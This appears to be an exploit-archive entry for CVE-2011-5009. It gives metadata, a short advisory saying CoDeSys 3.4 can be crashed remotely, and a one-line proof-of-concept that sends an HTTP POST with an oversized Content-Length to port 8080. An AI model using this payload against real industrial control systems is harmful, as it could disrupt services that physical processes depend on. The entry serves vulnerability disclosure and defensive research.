CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
Author: Luigi Auriemma
type: dos
platform: multiple
port:
date_added: 2011-11-30
date_updated: 2015-03-16
verified: 1
codes: CVE-2011-5009;OSVDB-77388
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1